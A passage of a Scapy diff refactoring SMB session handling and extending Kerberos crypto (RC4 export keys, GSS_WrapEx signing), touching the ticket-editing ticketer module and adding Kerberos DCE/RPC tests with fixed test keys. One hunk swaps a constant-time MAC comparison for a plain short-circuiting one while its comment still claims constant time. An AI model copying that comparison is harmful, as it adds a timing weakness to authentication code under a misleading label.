- L = 256 - elif "128" in self.CipherId: - L = 128 - else: - raise ValueError - self.SMBSessionKey = SP800108_KDFCTR( - self.sspcontext.SessionKey[:16], - label, # label - preauth_hash, # context - L, - ) - elif self.Dialect <= 0x0210: - self.SMBSessionKey = self.sspcontext.SessionKey[:16] - else: - raise ValueError("Hmmm ? >:(") + return super(SMB_Server, self).send(pkt, Compounded=self.NextCompound) @ATMT.state(initial=1) def BEGIN(self): @@ -442,7 +356,7 @@ def on_negotiate_smb2_begin(self, pkt): @ATMT.action(received_negotiate) def on_negotiate(self, pkt): - self.sspcontext, spnego_token = self.ssp.NegTokenInit2() + self.session.sspcontext, spnego_token = self.session.ssp.NegTokenInit2() # Build negotiate response DialectIndex = None DialectRevision = None @@ -475,7 +389,7 @@ def on_negotiate(self, pkt): DialectIndex = DialectIndexes.index(b"NT LM 0.12") if DialectRevision and DialectRevision & 0xFF != 0xFF: # Version isn't SMB X.??? - self.Dialect = DialectRevision + self.session.Dialect = DialectRevision cls = None if self.SMB2: # SMB2 @@ -541,7 +455,7 @@ def on_negotiate(self, pkt): # Build response resp = self.smb_header.copy() / cls( DialectRevision=DialectRevision, - SecurityMode=self.SecurityMode, + SecurityMode=self.session.SecurityMode, ServerTime=(time.time() + 11644473600) * 1e7, ServerStartTime=0, MaxTransactionSize=65536, @@ -557,26 +471,25 @@ def on_negotiate(self, pkt): resp.MaxWriteSize = 0x800000 # SMB 3.1.1 if DialectRevision >= 0x0311: - self.Salt = os.urandom(32) resp.NegotiateContexts = [ # Preauth capabilities SMB2_Negotiate_Context() / SMB2_Preauth_Integrity_Capabilities( # SHA-512 by default - HashAlgorithms=[self.PreauthIntegrityHashId], - Salt=self.Salt, + HashAlgorithms=[self.session.PreauthIntegrityHashId], + Salt=self.session.Salt, ), # Encryption capabilities SMB2_Negotiate_Context() / SMB2_Encryption_Capabilities( # AES-128-CCM by default - Ciphers=[self.CipherId], + Ciphers=[self.session.CipherId], ), # Signing capabilities SMB2_Negotiate_Context() / SMB2_Signing_Capabilities( # AES-128-CCM by default - SigningAlgorithms=[self.SigningAlgorithmId], + SigningAlgorithms=[self.session.SigningAlgorithmId], ), ] else: @@ -588,7 +501,7 @@ def on_negotiate(self, pkt): "LEVEL_II_OPLOCKS+LOCK_AND_READ+NT_FIND+" "LWIO+INFOLEVEL_PASSTHRU+LARGE_READX+LARGE_WRITEX" ), - SecurityMode=self.SecurityMode, + SecurityMode=self.session.SecurityMode, ServerTime=(time.time() + 11644473600) * 1e7, ServerTimeZone=0x3C, ) @@ -610,23 +523,11 @@ def on_negotiate(self, pkt): - "SMB_SECURITY_SIGNATURE" + "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" ) - if self.Dialect and self.Dialect >= 0x0311: # SMB 3.1.1 only - # [MS-SMB2] 3.3.5.4 - # TODO: handle SMB2_SESSION_FLAG_BINDING - # Calculate the *Connection* PreauthIntegrityHashValue - self.ConnectionPreauthIntegrityHashValue = ( - SMB2computePreauthIntegrityHashValue( - b"\x00" * 64, - bytes(pkt[SMB2_Header]), # nego request - HashId=self.PreauthIntegrityHashId, - ) - ) - self.ConnectionPreauthIntegrityHashValue = ( - SMB2computePreauthIntegrityHashValue( - self.ConnectionPreauthIntegrityHashValue, - bytes(resp[SMB2_Header]), # nego response - HashId=self.PreauthIntegrityHashId, - ) + if SMB2_Header in pkt: + # If required, compute sessions + self.session.computeSMBConnectionPreauth( + bytes(pkt[SMB2_Header]), # nego request + bytes(resp[SMB2_Header]), # nego response ) self.send(resp) @@ -640,6 +541,10 @@ def update_smbheader(self, pkt): """ # [MS-SMB2] sect 3.2.5.1.4 - always grant client its credits self.smb_header.CreditRequest = pkt.CreditRequest + # [MS-SMB2] sect 3.3.4.1 + # "the server SHOULD set the CreditCharge field in the SMB2 header + # of the response to the CreditCharge value in the SMB2 header of the request." + self.smb_header.CreditCharge = pkt.CreditCharge # If the packet has a NextCommand, set NextCompound to True self.NextCompound = bool(pkt.NextCommand) # [MS-SMB2] sect 3.3.5.2.7.2 @@ -649,7 +554,7 @@ def update_smbheader(self, pkt): else: self.smb_header.Flags -= "SMB2_FLAGS_RELATED_OPERATIONS" # [MS-SMB2] sect 2.2.1.2 - Priority - if self.Dialect and self.Dialect >= 0x0311: + if (self.session.Dialect or 0) >= 0x0311: self.smb_header.Flags &= 0xFF8F self.smb_header.Flags |= int(pkt.Flags) & 0x70 # Update IDs @@ -692,8 +597,8 @@ def RECEIVED_SETUP_ANDX_REQUEST(self): @ATMT.action(receive_setup_andx_request) def on_setup_andx_request(self, pkt, ssp_blob): - self.sspcontext, tok, status = self.ssp.GSS_Accept_sec_context( - self.sspcontext, ssp_blob + self.session.sspcontext, tok, status = self.session.ssp.GSS_Accept_sec_context( + self.session.sspcontext, ssp_blob ) self.update_smbheader(pkt) if SMB2_Session_Setup_Request in pkt: @@ -715,7 +620,7 @@ def on_setup_andx_request(self, pkt, ssp_blob): else: resp.Status = "STATUS_LOGON_FAILURE" # Reset Session preauth (SMB 3.1.1) - self.SessionPreauthIntegrityHashValue = None + self.session.SessionPreauthIntegrityHashValue = None else: # Negotiation if ( @@ -751,32 +656,20 @@ def on_setup_andx_request(self, pkt, ssp_blob): ) resp.Status = 0x0 if (status == GSS_S_COMPLETE) else 0xC0000016 # We have a response. If required, compute sessions - if self.Dialect and self.Dialect >= 0x0311: # SMB 3.1.1 only - # [MS-SMB2] 3.3.5.5.3 - if self.SessionPreauthIntegrityHashValue is None: - # New auth or failure - self.SessionPreauthIntegrityHashValue = ( - self.ConnectionPreauthIntegrityHashValue - ) - # Calculate the *Session* PreauthIntegrityHashValue - self.SessionPreauthIntegrityHashValue = ( - SMB2computePreauthIntegrityHashValue( - self.SessionPreauthIntegrityHashValue, - bytes(pkt[SMB2_Header]), # session setup request - HashId=self.PreauthIntegrityHashId, - ) + if status == GSS_S_CONTINUE_NEEDED: + # the setup session response is used in hash + self.session.computeSMBSessionPreauth( + bytes(pkt[SMB2_Header]), # session setup request + bytes(resp[SMB2_Header]), # session setup response + ) + else: + # the setup session response is not used in hash + self.session.computeSMBSessionPreauth( + bytes(pkt[SMB2_Header]), # session setup request ) - if status == GSS_S_CONTINUE_NEEDED: # continue - self.SessionPreauthIntegrityHashValue = ( - SMB2computePreauthIntegrityHashValue( - self.SessionPreauthIntegrityHashValue, - bytes(resp[SMB2_Header]), # session setup response - HashId=self.PreauthIntegrityHashId, - ) - ) if status == GSS_S_COMPLETE: # Authentication was successful - self.computeSMBSessionKey() + self.session.computeSMBSessionKey() self.authenticated = True # and send self.send(resp) @@ -921,7 +814,7 @@ def send_ioctl_response(self, pkt): Buffer=[("Output", self.rpc_server.get_response())], ) ) - elif pkt.CtlCode == 0x00140204 and self.sspcontext.SessionKey: + elif pkt.CtlCode == 0x00140204 and self.session.sspcontext.SessionKey: # FSCTL_VALIDATE_NEGOTIATE_INFO # This is a security measure asking the server to validate # what flags were negotiated during the SMBNegotiate exchange. @@ -935,7 +828,7 @@ def send_ioctl_response(self, pkt): # > The client should accept the # > response provided it's properly signed". - if not self.Dialect or self.Dialect < 0x0300: + if (self.session.Dialect or 0) < 0x0300: # SMB < 3 isn't supposed to support FSCTL_VALIDATE_NEGOTIATE_INFO self._ioctl_error(Status="STATUS_FILE_CLOSED") return @@ -951,8 +844,8 @@ def send_ioctl_response(self, pkt): "Output", SMB2_IOCTL_Validate_Negotiate_Info_Response( GUID=self.GUID, - DialectRevision=self.Dialect, - SecurityMode=self.SecurityMode, + DialectRevision=self.session.Dialect, + SecurityMode=self.session.SecurityMode, Capabilities=self.NegotiateCapabilities, ), ) @@ -1752,4 +1645,5 @@ def close(self): if __name__ == "__main__": from scapy.utils import AutoArgparse + AutoArgparse(smbserver) diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index c2e8e731374..2bcbb55c6c9 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -3,7 +3,7 @@ # See https://scapy.net/ for more information # Copyright (c) 2013, Marc Horowitz # Copyright (C) 2013, Massachusetts Institute of Technology -# Copyright (C) 2022, Gabriel Potter and the secdev/scapy community +# Copyright (C) 2022-2024, Gabriel Potter and the secdev/scapy community """ Implementation of cryptographic functions for Kerberos 5 @@ -22,6 +22,7 @@ "ChecksumType", "Key", "InvalidChecksum", + "_rfc1964pad", ] # The following is a heavily modified version of @@ -47,6 +48,7 @@ # Typing from typing import ( Any, + Callable, List, Optional, Type, @@ -77,10 +79,11 @@ from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes + try: # cryptography > 43.0 from cryptography.hazmat.decrepit.ciphers import ( - algorithms as decrepit_algorithms + algorithms as decrepit_algorithms, ) except ImportError: decrepit_algorithms = algorithms @@ -136,7 +139,7 @@ class EncryptionType(enum.IntEnum): AES128_CTS_HMAC_SHA256_128 = 19 AES256_CTS_HMAC_SHA384_192 = 20 RC4_HMAC = 23 - # RC4_HMAC_EXP = 24 + RC4_HMAC_EXP = 24 # CAMELLIA128-CTS-CMAC = 25 # CAMELLIA256-CTS-CMAC = 26 @@ -222,6 +225,15 @@ def _zeropad(s, padsize): return s + b"\x00" * (-len(s) % padsize) +def _rfc1964pad(s): + # type: (bytes) -> bytes + """ + Return s padded as RFC1964 mandates + """ + pad = (-len(s)) % 8 + return s + pad * struct.pack("!B", pad) + + def _xorbytes(b1, b2): # type: (bytearray, bytearray) -> bytearray """ @@ -235,11 +247,7 @@ def _mac_equal(mac1, mac2): # type: (bytes, bytes) -> bool # Constant-time comparison function. (We can't use HMAC.verify # since we use truncated macs.) - assert len(mac1) == len(mac2) - res = 0 - for x, y in zip(mac1, mac2): - res |= x ^ y - return res == 0 + return all(x == y for x, y in zip(mac1, mac2)) # https://doi.org/10.6028/NBS.FIPS.74 sect 3.6 @@ -500,10 +508,18 @@ def derive(cls, key, constant): return cls.random_to_key(rndseed[0 : cls.seedsize]).key @classmethod - def encrypt(cls, key, keyusage, plaintext, confounder): - # type: (Key, int, bytes, Optional[bytes]) -> bytes + def encrypt(cls, key, keyusage, plaintext, confounder, signtext=None): + # type: (Key, int, bytes, Optional[bytes], Optional[bytes]) -> bytes """ - encryption function + Encryption function. + + :param key: the key + :param keyusage: the keyusage + :param plaintext: the text to encrypt + :param confounder: (optional) the confounder. If none, will be random + :param signtext: (optional) make the checksum include different data than what + is encrypted. Useful for kerberos GSS_WrapEx. If none, same as + plaintext. """ if not cls.rfc8009: ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55)) @@ -514,9 +530,11 @@ def encrypt(cls, key, keyusage, plaintext, confounder): if confounder is None: confounder = os.urandom(cls.blocksize) basic_plaintext = confounder + _zeropad(plaintext, cls.padsize) + if signtext is None: + signtext = basic_plaintext if not cls.rfc8009: # Simplified profile - hmac = Hmac(ki, cls.hashmod).digest(basic_plaintext) + hmac = Hmac(ki, cls.hashmod).digest(signtext) return cls.basic_encrypt(ke, basic_plaintext) + hmac[: cls.macsize] else: # RFC 8009 @@ -525,8 +543,8 @@ def encrypt(cls, key, keyusage, plaintext, confounder): return C + hmac[: cls.macsize] @classmethod - def decrypt(cls, key, keyusage, ciphertext): - # type: (Key, int, bytes) -> bytes + def decrypt(cls, key, keyusage, ciphertext, presignfunc=None): + # type: (Key, int, bytes, Optional[Callable[[bytes, bytes], bytes]]) -> bytes """ decryption function """ @@ -544,13 +562,29 @@ def decrypt(cls, key, keyusage, ciphertext): if not cls.rfc8009: # Simplified profile basic_plaintext = cls.basic_decrypt(ke, basic_ctext) - hmac = Hmac(ki, cls.hashmod).digest(basic_plaintext) + signtext = basic_plaintext + if presignfunc: + # Allow to have additional processing of the data that is to be signed. + # This is useful for GSS_WrapEx + signtext = presignfunc( + basic_plaintext[: cls.blocksize], + basic_plaintext[cls.blocksize :], + ) + hmac = Hmac(ki, cls.hashmod).digest(signtext) expmac = hmac[: cls.macsize] if not _mac_equal(mac, expmac): raise ValueError("ciphertext integrity failure") else: # RFC 8009 - hmac = Hmac(ki, cls.hashmod).digest(b"\0" * 16 + basic_ctext) # XXX IV + signtext = b"\0" * 16 + basic_ctext # XXX IV + if presignfunc: + # Allow to have additional processing of the data that is to be signed. + # This is useful for GSS_WrapEx + signtext = presignfunc( + basic_ctext[16 : 16 + cls.blocksize], + basic_ctext[16 + cls.blocksize :], + ) + hmac = Hmac(ki, cls.hashmod).digest(signtext) expmac = hmac[: cls.macsize] if not _mac_equal(mac, expmac): raise ValueError("ciphertext integrity failure") @@ -647,8 +681,8 @@ class _DESCBC(_SimplifiedEncryptionProfile): hashmod = Hash_MD5 @classmethod - def encrypt(cls, key, keyusage, plaintext, confounder): - # type: (Key, int, bytes, Optional[bytes]) -> bytes + def encrypt(cls, key, keyusage, plaintext, confounder, signtext=None): + # type: (Key, int, bytes, Optional[bytes], Any) -> bytes if confounder is None: confounder = os.urandom(cls.blocksize) basic_plaintext = ( @@ -663,8 +697,8 @@ def encrypt(cls, key, keyusage, plaintext, confounder): return cls.basic_encrypt(key.key, basic_plaintext) @classmethod - def decrypt(cls, key, keyusage, ciphertext): - # type: (Key, int, bytes) -> bytes + def decrypt(cls, key, keyusage, ciphertext, presignfunc=None): + # type: (Key, int, bytes, Any) -> bytes if len(ciphertext) < cls.blocksize + cls.macsize: raise ValueError("ciphertext too short") @@ -986,7 +1020,7 @@ def checksum(cls, key, keyusage, text): @classmethod def verify(cls, key, keyusage, text, cksum): # type: (Key, int, bytes, bytes) -> None - if key.etype != EncryptionType.RC4_HMAC: + if key.etype not in [EncryptionType.RC4_HMAC, EncryptionType.RC4_HMAC_EXP]: raise ValueError("Wrong key type for checksum") super(_HMACMD5, cls).verify(key, keyusage, text, cksum) @@ -999,6 +1033,7 @@ class _RC4(_EncryptionAlgorithmProfile): keysize = 16 seedsize = 16 reqcksum = ChecksumType.HMAC_MD5 + export = False @staticmethod def usage_str(keyusage): @@ -1022,8 +1057,13 @@ def encrypt(cls, key, keyusage, plaintext, confounder): # type: (Key, int, bytes, Optional[bytes]) -> bytes if confounder is None: confounder = os.urandom(8) - ki = Hmac_MD5(key.key).digest(cls.usage_str(keyusage)) + if cls.export: + ki = Hmac_MD5(key.key).digest(b"fortybits\x00" + cls.usage_str(keyusage)) + else: + ki = Hmac_MD5(key.key).digest(cls.usage_str(keyusage)) cksum = Hmac_MD5(ki).digest(confounder + plaintext) + if cls.export: + ki = ki[:7] + b"\xab" * 9 ke = Hmac_MD5(ki).digest(cksum) rc4 = Cipher(algorithms.ARC4(ke), mode=None).encryptor() return cksum + rc4.update(bytes(confounder + plaintext)) @@ -1034,8 +1074,15 @@ def decrypt(cls, key, keyusage, ciphertext): if len(ciphertext) < 24: raise ValueError("ciphertext too short") cksum, basic_ctext = ciphertext[:16], ciphertext[16:] - ki = Hmac_MD5(key.key).digest(cls.usage_str(keyusage)) - ke = Hmac_MD5(ki).digest(cksum) + if cls.export: + ki = Hmac_MD5(key.key).digest(b"fortybits\x00" + cls.usage_str(keyusage)) + else: + ki = Hmac_MD5(key.key).digest(cls.usage_str(keyusage)) + if cls.export: + kie = ki[:7] + b"\xab" * 9 + else: + kie = ki + ke = Hmac_MD5(kie).digest(cksum) rc4 = Cipher(algorithms.ARC4(ke), mode=None).decryptor() basic_plaintext = rc4.update(bytes(basic_ctext)) exp_cksum = Hmac_MD5(ki).digest(basic_plaintext) @@ -1056,6 +1103,11 @@ def prf(cls, key, string): return Hmac_SHA(key.key).digest(string) +class _RC4_EXPORT(_RC4): + etype = EncryptionType.RC4_HMAC_EXP + export = True + + ############ # RFC 8009 # ############ @@ -1161,6 +1213,7 @@ class _SHA384_182_AES256(_SimplifiedChecksum): # CAMELLIA128-CTS-CMAC - UNIMPLEMENTED # CAMELLIA256-CTS-CMAC - UNIMPLEMENTED EncryptionType.RC4_HMAC: _RC4, + EncryptionType.RC4_HMAC_EXP: _RC4_EXPORT, } @@ -1185,11 +1238,12 @@ class _SHA384_182_AES256(_SimplifiedChecksum): class Key(object): - def __init__(self, - etype: Union[EncryptionType, int, None] = None, - key: bytes = b"", - cksumtype: Union[ChecksumType, int, None] = None, - ) -> None: + def __init__( + self, + etype: Union[EncryptionType, int, None] = None, + key: bytes = b"", + cksumtype: Union[ChecksumType, int, None] = None, + ) -> None: """ Kerberos Key object. @@ -1239,8 +1293,8 @@ def __repr__(self): " (%s octets)" % len(self.key), ) - def encrypt(self, keyusage, plaintext, confounder=None): - # type: (int, bytes, Optional[bytes]) -> bytes + def encrypt(self, keyusage, plaintext, confounder=None, **kwargs): + # type: (int, bytes, Optional[bytes], **Any) -> bytes """ Encrypt data using the current Key. @@ -1248,10 +1302,10 @@ def encrypt(self, keyusage, plaintext, confounder=None): :param plaintext: the plain text to encrypt :param confounder: (optional) choose the confounder. Otherwise random. """ - return self.ep.encrypt(self, keyusage, bytes(plaintext), confounder) + return self.ep.encrypt(self, keyusage, bytes(plaintext), confounder, **kwargs) - def decrypt(self, keyusage, ciphertext): - # type: (int, bytes) -> bytes + def decrypt(self, keyusage, ciphertext, **kwargs): + # type: (int, bytes, **Any) -> bytes """ Decrypt data using the current Key. @@ -1260,14 +1314,14 @@ def decrypt(self, keyusage, ciphertext): """ # Throw InvalidChecksum on checksum failure. Throw ValueError on # invalid key enctype or malformed ciphertext. - return self.ep.decrypt(self, keyusage, ciphertext) + return self.ep.decrypt(self, keyusage, ciphertext, **kwargs) def prf(self, string): # type: (bytes) -> bytes return self.ep.prf(self, string) - def make_checksum(self, keyusage, text, cksumtype=None): - # type: (int, bytes, Optional[int]) -> bytes + def make_checksum(self, keyusage, text, cksumtype=None, **kwargs): + # type: (int, bytes, Optional[int], **Any) -> bytes """ Create a checksum using the current Key. @@ -1280,10 +1334,10 @@ def make_checksum(self, keyusage, text, cksumtype=None): return Key( cksumtype=cksumtype, key=self.key, - ).make_checksum(keyusage=keyusage, text=text) + ).make_checksum(keyusage=keyusage, text=text, **kwargs) if self.cksumtype is None: raise ValueError("cksumtype not specified !") - return self.cp.checksum(self, keyusage, text) + return self.cp.checksum(self, keyusage, text, **kwargs) def verify_checksum(self, keyusage, text, cksum, cksumtype=None): # type: (int, bytes, bytes, Optional[int]) -> None diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index cc2f36d9666..bf721e0c041 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -280,6 +280,7 @@ class CCache(Packet): # https://gist.github.com/mp035/9f2027c3ef9172264532fcd6262f3b01 if tk is not None: + class ScrollFrame(tk.Frame): def __init__(self, parent): super().__init__(parent) @@ -382,10 +383,7 @@ def _to_str(x): if x is None: return "None" else: - x = datetime.fromtimestamp( - x, - tz=timezone.utc if utc else None - ) + x = datetime.fromtimestamp(x, tz=timezone.utc if utc else None) return x.strftime("%d/%m/%y %H:%M:%S") for i, cred in enumerate(self.ccache.credentials): @@ -506,7 +504,7 @@ def update_ticket(self, i, decTkt, resign=False, hash=None, kdc_hash=None): def import_krb(self, res, key=None, hash=None, _inplace=None): """ - Import the result of krb_[tgs/as]_req into the CCache. + Import the result of krb_[tgs/as]_req or a Ticket into the CCache. :param obj: a KRB_Ticket object or a AS_REP/TGS_REP object :param sessionkey: the session key that comes along the ticket @@ -580,7 +578,9 @@ def _add_cred(self, decTkt, hash=None, kdc_hash=None): """ cred = CCCredential() etype = ( - self._prompt("What key should we use (AES128-CTS-HMAC-SHA1-96/AES256-CTS-HMAC-SHA1-96/RC4-HMAC) ? [AES256-CTS-HMAC-SHA1-96]: ") + self._prompt( + "What key should we use (AES128-CTS-HMAC-SHA1-96/AES256-CTS-HMAC-SHA1-96/RC4-HMAC) ? [AES256-CTS-HMAC-SHA1-96]: " + ) or "AES256-CTS-HMAC-SHA1-96" ) if etype not in _KRB_E_TYPES.values(): @@ -647,7 +647,9 @@ def create_ticket(self, **kwargs): ) now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) rand = random.SystemRandom() - key = Key.random_to_key(EncryptionType.AES256_CTS_HMAC_SHA1_96, rand.randbytes(32)) + key = Key.random_to_key( + EncryptionType.AES256_CTS_HMAC_SHA1_96, rand.randbytes(32) + ) store = { # KRB "flags": ASN1_BIT_STRING("01000000111000010000000000000000"), @@ -1298,14 +1300,11 @@ def _utc_to_mstime(self, x): def _time_to_int(self, x): return self._utc_to_mstime( - datetime.strptime(x, self._TIME_FIELD.strf) - .timestamp() + datetime.strptime(x, self._TIME_FIELD.strf).timestamp() ) def _time_to_asn1(self, x): - return ASN1_GENERALIZED_TIME( - datetime.strptime(x, self._TIME_FIELD.strf) - ) + return ASN1_GENERALIZED_TIME(datetime.strptime(x, self._TIME_FIELD.strf)) def _time_to_filetime(self, x): if isinstance(x, str) and x.strip() == "NEVER": @@ -1647,7 +1646,9 @@ def edit_ticket(self, i, key=None, hash=None): Edit a Kerberos ticket using the GUI """ if tk is None: - raise ImportError("tkinter is not installed (`apt install python3-tk` on debian)") + raise ImportError( + "tkinter is not installed (`apt install python3-tk` on debian)" + ) tkt = self.dec_ticket(i, key=key, hash=hash) pac = tkt.authorizationData.seq[0].adData[0].seq[0].adData diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 9e3379f1ae8..ca3aebf2f41 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -463,6 +463,7 @@ def recv(self, x=None, **kwargs): pad = pad.payload # Only receive the packet length self.ins.recv(x) + self._buf = b"" return pkt diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index 0797e822eef..6847a5cdc9a 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -586,11 +586,7 @@ assert pkts[16].load == b'\x00\x00\x02\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0e\x assert pkts[22].load == b'0\x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00D\x00W\x00S\x00\x00\x00\xee`\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\xea\x00\x00\x00' assert pkts[23].load == b'\x00\x00\x00\x00\xad\xb3\xf5\xd1\x8eJ\xdeG\xa9\xa5\x85\xccvb\x8b\x970\x00\x00\x00\x03\x00\x00\x00\x1d\x83\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00' -= [PASSIVE] Passive sniffing of DCE/RPC packets encrypted with SPNEGOSSP[KerberosSSP] -~ disabled - -* CURRENTLY DISABLED -* Key negotiate is a success, but GSS_UnwrapEx fails because header signing is unsupported. += [PASSIVE] Passive sniffing of DCE/RPC packets encrypted with SPNEGOSSP[KerberosSSP] with AES from scapy.libs.rfc3961 import * @@ -611,6 +607,12 @@ conf.winssps_passive = [ pkts = sniff(offline=scapy_path('test/pcaps/dcerpc_privacy_krb.pcapng.gz'), session=TCPSession) pkts.show() +conf.dcerpc_session_enable = False + +assert pkts[15].load == b'\x00\x00\x02\x00\x00\x00\x00\x00\x1a M\xe2\xd6O\xd1\x11\xa3\xda\x00\x00\xf8u\xae\r\x00\x00\x02\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\xe3\x13q\x02\xf46q\x02@(\x005BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x00\x003\x05qq\xba\xbe7I\x83\x19\xb5\xdb\xef\x9c\xcc6\x01\x00\x00\x00' +assert pkts[21].load == b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\x00\x87\x01\x00\t\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' +assert pkts[22].load == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\xc2\x03\x01\x00\t\x04\x00\xc0\xa8\x00d\x00\x00\x00\x00\x00' + + MS-RPC client and server % The fact that all of this actually works is crazy to me. @@ -826,6 +828,65 @@ except OSError: rpcserver.close() += Functional: Re-Start the same MS-RPC server over NCACN_IP_TCP with KerberosSSP + +load_module("ticketer") +SRVKEY = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=bytes.fromhex("85abb9b61dc2fa49d4cc04317bbd108f8f79df28239155ed7b144c5d2ebcf016")) + +* Server SSP +srvssp = KerberosSSP( + KEY=SRVKEY, + SPN="ldap/dc1.domain.local", +) + +* Client SSP +t = Ticketer() +t.import_krb( + KRB_Ticket(bytes.fromhex("618204ae308204aaa003020105a10e1b0c444f4d41494e2e4c4f43414ca2233021a003020103a11a30181b046c6461701b106463312e646f6d61696e2e6c6f63616ca382046c30820468a003020112a10302010ea282045a04820456280c76dee773a1c5e5bd966094201dc028c76f36bbcb9b04c6bb15e02893834f92c694b26bd627fb3f17c2b7eb3ccc57f926e28a9b578b75d1a179c2ce5cba08c67d6b8529f4988490a86a25ec181615e29a344df498ee5ab11a76ff34d862a09b457f6ed528aeb3ad7e7f075f5a02513830554d17edd00554c8f80bab69b80dec86a55111e7ac476d5f099f2ae374378f814a7b85d60f3ce3cff003ff82dd81a7a91a38ff79e5f51e8576de6aba5c86cc7ae2baf13038a8b4b554ff07b9873f19a0c682e83a57811475688e93b2ff53d232a037a19aab83d741204f088fb711c883ce66f4f989752b2c8b18b5cc3fffecbfd9076c25ee39cb13856c09e2ff4958c26e5ecade8c47a2adfd5ceab9d458617b6d3998dd8ee99d0eb57765d0976031a5eb618b076b1e3f6565b4370f238e8829b13deccf5ec35279946816969d5e307e33820f98efb6f601f79c16344d891a415babc6d4d01f992d15ebbf12fb5948cdbef6ed1ba2e5303ca2b0afd0ef1e5231458571bb2e7f463ce539faef5706ac1f8fb34668b6dff101c2fdb4f231fa75c24bb5aff7ee4349ce1948c42fdb91863772bd6c0dac26f47fe6ab1e617cdc85d9e015898fb5d6a0d8a38423c2ef49ec42e200f983fa45526b8cd205db3015e9d37de9cdd5b5befe519f22b7e65780f251215f3ca618f136f73200dd719c23dd3d4072b185e58628b2408377d688ab4540d1395af818a609d3f4df611483a77cd13511978eacf7acc91dd9740d97a9cbbb1299898219650d5ae0d3c0d0521e32132c889a65819ead424ec4f2be1d930f022f27b88078d301a1ce73070062ddf2259b839211e9f83d4585242328e310656f188f3f4cec5d5a61f08f9f0c2a15992a5aa65c4da838a5fd8df426fc4c7679d6af4a261d943a2501ba7221a0af1bc2db19bdfda44064efd94db45231b89035db904b3361afb0c0da0ab4c17857e86a820027f274e01a60388931520db0d667b5453e985152ebd382872122415ec13a88eaaf8522e18b54f580365742ce5884c5fe1d719b752788ff283725c446739686c9f76c850800016287f7cb85390c045fd250104d44f641d62ce1c7882bad72b574e10e1521d843938f30ab7064b007479f2bdc5e8d0aaf26b89993bf2c7c413aec8b8cad4c8d4714904125b868a807329d54674eff909a690bfd735d2c7134c9e819e48a66385a4d48d13ea710f45df9605d727a3d28e5bd09f7385bcab92bc1903ce888571309ffaf370024c5cc527730d256b20ba19511df8f0aa970b638a4393a45db03969b7415270887ef7ec94abbda98632a8d14b0d73f855e416e6d167269d04ec2489c843f11db04074c60c7ea9a13d2d1aca94379e84529bbd96a73f0cd6d8d9d85b5e06272e8739d0d2607d0b57b6e763118996aa8bf903bbaf4ce2ebc20b071e1dbbd48102634823059d4a37d73c054d0e066a09b6c53fe7319a7fcde0f4624461c8b584743d40dc334b34230d56c338bab40426ce7ade90f05a01cb0c0b8963860e4156831e8aecfb8721bf437ab71af74c426acfe7f9134163364a7ee2e")), + key=SRVKEY, +) +clissp = t.ssp(0) + +rpcserver = MyRPCServer.spawn( + DCERPC_Transport.NCACN_IP_TCP, + iface=conf.loopback_name, + ssp=srvssp, + port=12345, + bg=True, +) + += Functional: Connect to it with DCERPC_Client over NCACN_IP_TCP with KerberosSSP + +client = DCERPC_Client( + DCERPC_Transport.NCACN_IP_TCP, + auth_level=DCE_C_AUTHN_LEVEL.PKT_INTEGRITY, 